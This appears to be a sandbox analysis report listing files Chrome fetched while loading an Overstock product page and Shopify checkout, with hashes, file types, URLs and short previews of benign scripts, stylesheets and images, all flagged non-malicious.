                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                                                                    MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                                                                    SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                                                                    SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                                                                    SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (61316)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):61482
                                                                                                                                                                                    Entropy (8bit):5.508146171238403
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:uYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLIY:uYW2Pj5yO7t2ACRg8398vh
                                                                                                                                                                                    MD5:09FEC95508BB6201576D3B8FF8E19C37
                                                                                                                                                                                    SHA1:B8CD97960B326E41229792E1A0C92B39CBDAD4B8
                                                                                                                                                                                    SHA-256:948E757FEC2870BC5B65F95AE4637636DA5FB20A4EA3C20A6AC2CF82FFD240E6
                                                                                                                                                                                    SHA-512:D9647CFD7D12358EB4557B3D65AAFD7E9212C3101700CB923A66E3EA0EC2A23715B4FDE1C3B21142B8B6BEF8E858FB10515C2F127DF573B5BBAE1B284568876F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));var r=t.replace(/^\s+/,"").replace(/\(eval code/g,"(").replace(/^.*?\s+/,""),n=r.match(/ (\(.+\)$)/);r=n?r.replace(n[0],""):r;var i=this.extractL
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1568
                                                                                                                                                                                    Entropy (8bit):6.772785068260746
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:vTCIl/X2YlXWI2PUas9ucVDt8L38qWS/Rf0DBxbX4HInsLfU+dhiBTjyOgoB:OIl/XflgsIC8j8Iw5X+InsortjB
                                                                                                                                                                                    MD5:12531083B2FE2430E0C386212DE8F4AF
                                                                                                                                                                                    SHA1:5F4F543ADB324BF88B01EB65BD179A6B30E30C6F
                                                                                                                                                                                    SHA-256:D0D4D116DA2894001D0795E1DBF147050290CDB7A49BD78A1DE3DF3E5D766158
                                                                                                                                                                                    SHA-512:3837C4C6EFA8E0562F7F81D6F2D8B82AAE83512870EEF193B2CF093DA6BBE6ABBFE26461F5B9E15E8028513578D45B47545FD5736C6C75E80340F6897B9427F6
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_2c70b6b0-3a9f-474f-93c7-715a9d87237d.jpg?v=1729325322&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..B.!!.l.T ....Bb.Ov.~.......n?.....d..=.y.u....3~.~..m......)o....Y......^.u...`.........?....NSM....f.q2.=O.mgS.(.....C.*>{;.f..).t?jp1..A......h...........c+...Z..3.hK....X.......p./.V.E.;%..'.....b%H....p.K6..B...e.f...{..%+.....A:..vs....F`.[.to......<.>......y3..*.....8.Je...&...fc..UBu...........Ca4>-G..Ki......!R1...........S..q..8.Xw.y...'...3C`.b....mY.N.Z.V.......$...c.J...q..a1..l..;>0N?)=.$N...K.p]....Z.y.2..z....V.0...}b.}..M%6.$.mn...9.)Q..P.puI.~,.p..52........9..4J. .
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3548
                                                                                                                                                                                    Entropy (8bit):7.437246792954632
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NBIl/XrxML0foODsg9X0BprYp3/4RukmxF:N23lwg9QU1eOD
                                                                                                                                                                                    MD5:C47F79E8AEC2887AA05249CBCA9AFA0E
                                                                                                                                                                                    SHA1:4557C40F571F65073B06ECE11839E2801EE5A0BD
                                                                                                                                                                                    SHA-256:95AF74B4021C6160245E9E7150537D961406EA748DBDBD25D4F49C39D2F7E930
                                                                                                                                                                                    SHA-512:D114659B87F51961E58EFC2CE57F06808AE020D23FF47AAA2F4B5AF890F06DA25C75201B791C6492C5D36B5A637C74153B4469C27E2AE365AD0AC65F99D7A58A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P.................................................................................{..-c.X.Bn.Y.=eMB7^.Z..~......u;P.]g.A...8..KMHa%.........]...d...}`....N6..`..\......f.8GT..X..Jr......t.I.;.f.3.l....T.9.....~.fT.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1032x1032, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):35060
                                                                                                                                                                                    Entropy (8bit):7.987578571784139
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:ZkQFqcIbBSYsHxHXFJoq+/sGM6Cg94AZDVfxKloYvn:CBc+y5VVasjFg4AZDVJXYvn
                                                                                                                                                                                    MD5:BC125C442F4F428B11BCA1FDEFE7AB20
                                                                                                                                                                                    SHA1:1D9BB4C0CC8DAD698B42DE5256026CBF3B443165
                                                                                                                                                                                    SHA-256:7072166C0CA51C194274271C74BA0B6905CEEE175EB02B0ADFE74C1590FF85C5
                                                                                                                                                                                    SHA-512:67848275ED09B7C813B10C97EF748BBAF82BDEA5208804531D54209AED3BB7363F8F6B39C8D46E9BD0F24A96849D50F5A662B9E8F684B401D59DD7A06AFAE0AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/10142024_516x516_Facet_Outdoor.jpg?imwidth=1920?imwidth=1920
                                                                                                                                                                                    Preview:RIFF...WEBPVP8 ....p....*....?%..Y.9.....+.$.en....&+0=i.^k.q.K..a.l..|."..^c...I...}{,.G.....6:e..........zC.....?..?l.........<w..s..}.........d.....h?.t6xp.C.L.e.t.L..v...;S.........@.j` ..0......L..v...;S.........@.j` ..0......L..v...;S.........@.j` ..0......L..v...;S.........@.j` ..0......L..v...;S....|g........]......L..v...;S.........tM....Q....RZh...H..{.j...),&......$.a..h\..Z.E.PR.J...[..3..F...z......&....J......2^..Yu];S.........@.j`.A:/.UN.*...a....zt.8,.v.t|..P..h.8.....}...B.....;.M4..'...zsaE..E7D.d?.!(...).._...j` ..0......L..>...K..G.O@>...n.C%....St....'r...C..&b]28..MWHt8n...Tk.%...h&K. 6.h..d....1.;!...k.0j~".*....../_.-..[.E.c....Tx`V..+.g.C......ci...r[.b..M...%4........U.0......L..a.i/..........[5;8.!#...Q....;[.6......<1'...)....T.}(.k..G,..).....p..iF..cp.....2...5....$.C._*.*...2ck..3d.!d...Z.H+..c....0...4...`s....Y..].z_..L..v...;S...........w..r.3...ozF.s[&..]...`0M.k....BC.C...N..V..6.....z...O..~7.>[....B...;
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (336)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):458
                                                                                                                                                                                    Entropy (8bit):5.083093074926281
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:12:giPtydgJowCfMCgCfMClS4QaEoWH1ARMAsk7v:giPtyeJFLjLqsosCRZXr
                                                                                                                                                                                    MD5:642173BE054799A424915838F618D190
                                                                                                                                                                                    SHA1:C2EB119D3CDA65072343E80FC341116931E2CED3
                                                                                                                                                                                    SHA-256:2792BF612B0764521F758C6C458A332BF0F42F312C8D27EBE6F8F465FC0F3B45
                                                                                                                                                                                    SHA-512:3C63CEFCB0FF7C97A4843BB204FA4E722C3756F9BE9717B8B00D0BC58B4B82BB35BF46ED6EE1423E0CF2C477922502B352094118A2C62CDB27AB7BCEDB2FD7AA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:shopify.extend('WebPixel::Render', function (api) {. var analytics=api.analytics,browser=api.browser,init=api.init;. var e=api._pixelInfo?api._pixelInfo.runtimeContext:null,n=api._pixelInfo?api._pixelInfo.type:null;analytics.subscribe("all_standard_events",(function(i){var l,o;l=i.name,o=i,browser.localStorage.getItem("shopify-pixel-mode").then((function(i){"debug"===i&&console.log(`[shopify-pixel][${n}][${e}] ${l}`,o)})).catch((function(){}))}));.});.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7346), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7346
                                                                                                                                                                                    Entropy (8bit):5.660884967602087
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:yZyxg4c78BbzBN/BhYBgeB4kBKEB1qB3DKnBmIQBIZlBuFB+GBT9BnyBb3:y4xg4c789zH/PYWe2kwEvqFKnEIQe3gm
                                                                                                                                                                                    MD5:FFFDFAD79869B525ED1D7F746C1D5E16
                                                                                                                                                                                    SHA1:4585A69F12D7991D1D3369108EC024E1E20E1B57
                                                                                                                                                                                    SHA-256:B8DA2F78162B94A11C023822160A0F1D0B07D4B9CB3E7AC85C47C620530162B7
                                                                                                                                                                                    SHA-512:929DE171EA7A7C415D550451CE708CFFC1CC573FFF7EC6B6EAE27B8AE8184D4BBCDF0724C6282B0659D3B3634A84555A923DF3D2E527308DE05812E054F4FC52
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/11435964337?random=1730294622568&cv=11&fst=1730294622568&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v9172781734z89176705627za201zb9176705627&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.overstock.com%2Fproducts%2Fmia-oversized-modular-sectional-fabric-sofa-38169103%3Fvariant%3D50892052725919%26searchidx%3D0&top=https%3A%2F%2Fwww.overstock.com%2Fwpm%40d9f539ffw0e1474c4pae8b6d69m179c86ad%2Fcustom%2Fweb-pixel-17006751%4084%2Fsandbox%2Fmodern%2Fproducts%2Fmia-oversized-modular-sectional-fabric-sofa-38169103%3Fvariant%3D50892052725919%26searchidx%3D0&hn=www.googleadservices.com&frm=2&tiba=Mia%20Oversized%20Modular%20Sectional%20Fabric%20Sofa%20%E2%80%93%20Overstock&npa=0&pscdl=noapi&auid=164462539.1730294546&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dpage_viewed
                                                                                                                                                                                    Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":15552000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s164462539.1730294546","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s164462539.1730294546\u0026ig_key=1sNHMxNjQ0NjI1MzkuMTczMDI5NDU0Ng!2saA-BYA!3sAAptDV6jker1\u0026tag_eid=44800267","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1szSHUfQ!2saA-BYA!3sAAptDV6jker1","1i44800267"],"userBiddingSignals":[["8605899945","8605118546","8605117709","8605163949","8605218413","8604357350","8604994774","8526177074","86049
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12701)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):13363
                                                                                                                                                                                    Entropy (8bit):5.38931773767702
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:b5bYu28BX+l4qMufAlXBmdWbDJyGdUpCpZv:bhY7KvedAnZv
                                                                                                                                                                                    MD5:15DE19F42B35806FAF815298644157E0
                                                                                                                                                                                    SHA1:62315E4A2013AAEC6AF762D71FCC800136494628
                                                                                                                                                                                    SHA-256:7F06DEF529E0076B37F65C60085A6B1C65F1BBAB0B1F87C72C188018B5094966
                                                                                                                                                                                    SHA-512:6506BA8B6465070FEAA86BE8803F53825B9A9922D394043CC7052CD6FBEA9548C343E6EEC7137C5D3A5BA80C11A1B02C6C6B442AE59DA3D48DEC14602062B2DB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:/*.Copyright 2010 Google Inc..Copyright 2016 Akamai Technolgies..Licensed under the Apache License, Version 2.0 (the "License");.you may not use this file except in compliance with the License..You may obtain a copy of the License at.. http://www.apache.org/licenses/LICENSE-2.0..Unless required by applicable law or agreed to in writing, software.distributed under the License is distributed on an "AS IS" BASIS,.WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied..See the License for the specific language governing permissions and.limitations under the License...See the source code here:. http://code.google.com/p/episodes/.*/...!function(){function e(e,s){function u(){this.data={},this.value=[]}function d(e,t){for(var n={},r=s.getElementsByTagName(t),o=0;o<r.length;o++)e.href=r[o].src||r[o].href,e.href.match(/^https?:\/\//)&&(n[e.href]=r[o]);return n}function p(e,t){if(e&&e.hasAttribute("rel"))for(var n=e.rel.split(/[\u0009\u000A\u000C\u000D\u0020]+/),r=0;r<n.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (19480)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):19537
                                                                                                                                                                                    Entropy (8bit):5.357139179284184
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:6D9PXPfPfXfA8FotpZ+Sgm5oMbJUXkmOhS0i9IFCdxPnn:e9PXPfPfPA8FotpZ+ooMbJEsT8xP
                                                                                                                                                                                    MD5:F4FF0F4C04AE8F39B0A4F70008A51858
                                                                                                                                                                                    SHA1:D6FDD872AF68B0982E46BA858305F920CE38ED52
                                                                                                                                                                                    SHA-256:68AC01885C353EE80D265C15DBA682F37D536CE72A1014EFA8347136A0DE3A65
                                                                                                                                                                                    SHA-512:A14E1B3026D957270E524F367735913B10F23FFE161D82324251CC8DEBD939E7655D4791DF0AF30D0AA12ECA4209186284F1480B42C6C10590FA7C2141B4BCAF
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useGooglePaySdk.VumOquMs.js
                                                                                                                                                                                    Preview:import{c5 as fe,gB as b,gC as Ie,gD as Re,gE as Q,gF as ve,gG as be,aZ as De,gH as Ne,gI as Oe,gJ as Ce,e as q,T as D,m as Te,fZ as T,f_ as G,fd as te,gK as Ge,dw as z,f$ as we,gL as Le,v as w,gM as ne,gN as Me,g6 as He,aO as O,aN as se,g5 as Ve,g3 as C,c7 as ke,gO as Ue,ga as Ye,q as R,gb as k,gP as ae,gQ as oe,at as B,gR as xe,J as re,gS as W,gT as F,gU as qe,gV as $,gW as ze,gX as Z,gY as Be,gZ as X,g_ as We,g$ as Fe,h0 as $e,h1 as ie,h2 as Ze,h3 as le,h4 as Je,h5 as je,h6 as Ke,h7 as Qe,h8 as Xe,aj as de,h9 as et,Z as tt,g9 as nt,ha as st,g4 as at,g0 as ot,A as rt,hb as it,y as ee}from"./app.DfgMZONA.js";class U extends Error{name="GooglePayGenericError"}class Ct extends Error{name="GooglePayCreateButtonError"}class lt extends Error{name="GooglePayDeveloperError"}class dt extends Error{name="GooglePayPaymentClientError"}class Y extends Error{name="GooglePaySubmissionError"}function ce(){return fe().currency}const ct="https://pay.google.com/gp/p/js/pay.js",ut=2,pt=0,gt={apiVersion:u
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3088)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3089
                                                                                                                                                                                    Entropy (8bit):5.366611758291363
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:MAWewyEhHOiaRrOGcpjTfovoa6KPrf1Z2SPEZlEpJWAN:TWz9huipjTjhKPrhJWa
                                                                                                                                                                                    MD5:604ECA43D36B0C6FD3C03E72E23EC0DA
                                                                                                                                                                                    SHA1:091179EA80344796A16605C499D1537460401393
                                                                                                                                                                                    SHA-256:E859BA643A9330D67E7BCE6333E5A3420790F654A6F6057E4066E8DDFB90391C
                                                                                                                                                                                    SHA-512:A0725F3FF2A7CCD386328223EEC386310C289A05DA0581FB766692F2933CB9B18CD4236CF8EF5A6918403A86756243702A9033188AA6BFFFD28769B59E7AB002
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:import{c as k,j as s,r as u}from"./vsearch-vendor.2xH_R9Qb.js";import{c as w,U as W,T as X,g as I,M as K,a as q,u as z,D as $,R as H,b as J,F as S,N as Q,d as V,S as Y,P as Z,e as j,f as ss,h as ts,i as es,j as as,k as P,p as F,r as R}from"./vsearch-autocomplete.CGRHStzc.js";const os="_wrapper_9ao0v_1",rs="_facets_9ao0v_14",cs="_searchResults_9ao0v_64",ns="_resultsSummary_9ao0v_70",ds="_sortedByDropdown_9ao0v_75",us="_productGrid_9ao0v_80",ls="_pagination_9ao0v_86",is="_isLoading_9ao0v_91",t={wrapper:os,facets:rs,searchResults:cs,resultsSummary:ns,sortedByDropdown:ds,productGrid:us,pagination:ls,isLoading:is},v=k.bind(t),ps=()=>{const[a,l]=u.useState(!0),[c,E]=u.useState(!1),[e,_]=u.useState({facets:[],taxonomyFacets:[],products:[],resultCount:0}),g=I()=="DESKTOP"?K:q,{urlState:n,patchUrlState:x}=z(),d=e.resultCount,N=Math.min(Math.ceil(d/(j+g)),es),C=d>1,A=e.products.length>0&&!c,O=e.products.length===0&&!a&&!c,D=e.products.length===0&&a&&!c,y=+n.page||+$,L=as({totalProductsCount:d,cu
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x480, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):25880
                                                                                                                                                                                    Entropy (8bit):7.978159055830525
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:iAN4jL5vSFLoTkvNtwnaUIbVzXwn+gbie2Cz2:TajNvSFLoTkvNcaUINX4+gue3C
                                                                                                                                                                                    MD5:281F868B2FA97F830B93D44F3744E224
                                                                                                                                                                                    SHA1:5BD204C97BAA107D5C7799606D29F2001E451817
                                                                                                                                                                                    SHA-256:39466FF3692F2D827201E8B4FAB1E4857C03D2071C266CF3C9EA982DF7AFB50D
                                                                                                                                                                                    SHA-512:A47723E56136471D3872668A8E4D1257D0D2B64C778A0276334B93FB4F092C99C52E63402314DF65E8D1CF97F7EAA374C50D7820C6FAB6E459E9F18DEAC24ABB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF...........................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr................................)......)$,$!$,$A3--3AK?<?K[QQ[rlr.............."..........4......................................................................;.......L.L..0.!.1..5}f..G..q.K..Y..4....j....\.QU4.yt.I!'aN.-..L."A..f.G..Q.|..bK..Y$&Hd..;X.0.a2a2T.!.1^.[.....Y...VP+"..8..`z.x..2u...$QU5.I2..2.gY.Q"A....'..v.<^..%..L...nQ...s.X.._.3;{*d..!.jfQGh.L.R3....p2O2f...HR.f]...0...;$.k.p.4.....'C'aN.-.A!(,J........./...i\.~.........*...n.};...3a..*f.....*#<.6f.p........Ykd..42Oa....b.].sz...I.q>.E..<..E..S-.\.^$J......z@.c..[.=....j.z?.V.+.}NXy....D.r..Eg.....T.4.....J."@(.O....3F....M..[...L.#bk...&..$.$.$..".....BP..X./D.V...9..|.S.......6.x~.......%.zS...YUd.0`...;.C;..F.ffmT...9V.5.Q......gW.w<........J(..2.d./.$....A..}..`.w..~......../....m...6vC.BL...d.V.y).R.#......3)b...4..u.*..ik.7{f.X>.6.&...fzI.Jb.}2......|.[...&...?Q.j.~gk.s..\S..W..Sj.{..53...`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):236064
                                                                                                                                                                                    Entropy (8bit):5.195770629378949
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:Agwu6Rt1SPF6p4UWKZ0XkpyRgLSaiHRUe/XuOZfPWA3eIfLyZhjCk69N0zINMOX6:ElSPKZ0Ue/HdeCiUDSF
                                                                                                                                                                                    MD5:4C965B143F80D0EAB27FB26A4B37AB3B
                                                                                                                                                                                    SHA1:BF64B89D9F081080B93C93DFD11C2CFB457681F2
                                                                                                                                                                                    SHA-256:21377182788CB986C201DB1447776A84B265380C1FB293EF9D5673E523DA37A2
                                                                                                                                                                                    SHA-512:6E123E68ABF6102295B213B232F764441E6E0EA8C4BEEB398624E96D597AFBB006E7C36EDB95086EE6AABF6702F2860AF033180255E4BD4B5AF82AA2EA335E3F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/app.whj6cDzT.css
                                                                                                                                                                                    Preview::root{--x-border-full: 1px;--x-border-block-end: 0 0 1px;--leu13r0: hsl(0, 0%, 85%);--x-border-radius-small: 3px;--x-border-radius-base: 5px;--x-border-radius-large: 10px;--x-border-radius-fully-rounded: 36px;--x-border-radius-none: 0;--x-border-width-base: 1px;--x-border-width-medium: 2px;--x-border-width-thick: 5px;--x-border-width-extra-thick: 10px}:root{--swn0j0: hsl(204, 77%, 39%);--swn0j1: hsl(0, 0%, 100%);--swn0j3: hsl(218, 100%, 99%);--swn0j4: hsl(218, 100%, 97%);--swn0j5: hsl(218, 100%, 94%);--swn0j6: hsla(204, 77%, 39%, .05);--swn0j2: hsl(204, 79%, 30%);--swn0j7: hsl(0, 0%, 0%);--swn0j8: hsl(213, 13%, 42%);--swn0j9: hsl(204, 77%, 39%);--swn0jb: hsl(204, 79%, 30%);--swn0ja: hsl(204, 79%, 30%);--swn0jc: hsl(0, 0%, 100%);--swn0jd: hsl(0, 0%, 100%);--swn0je: hsl(0, 77%, 49%);--swn0jg: hsl(0, 83%, 98%);--swn0jh: hsl(0, 89%, 96%);--swn0ji: hsl(0, 90%, 92%);--swn0jj: hsl(0, 0%, 100%);--swn0jk: hsl(0, 0%, 100%);--swn0jl: hsl(0, 77%, 49%);--swn0jf: hsl(0, 78%, 44%);--swn0jm: hsl(0, 91
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1757
                                                                                                                                                                                    Entropy (8bit):6.488629835810976
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:N7+CIl/X2YlXWI2PULxZ1qfeJxnh+aoR+QXp44+1X3P+SkAwqMHjktG2Kb:NBIl/XflVxrqfcyXT+ZPkAwFHjh
                                                                                                                                                                                    MD5:98E075963B10316B5D1810CF9DCA0F8D
                                                                                                                                                                                    SHA1:1BAE646284CE763F7632E4727406696E0FAB7C90
                                                                                                                                                                                    SHA-256:148DDEC109C47B1B2846C245A3E4ABB6DE4AFBB504578D4252100DBD5360489A
                                                                                                                                                                                    SHA-512:F7314FA2904BD08604A43FEC498CA8FE4FFB37F8EAE1C7D9EEDEE2F5A746D3799F7B5BCB8C17BED3F289F1B5EC1EF736B99E4F4119CB960841F5581233F5D31B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P................................................................................................|.....U-...x.sg.Bc..z..;gR.1.x.....:o.t....G:..#va.~z..w'...............9..........................!.."1Q..A#2Raq...
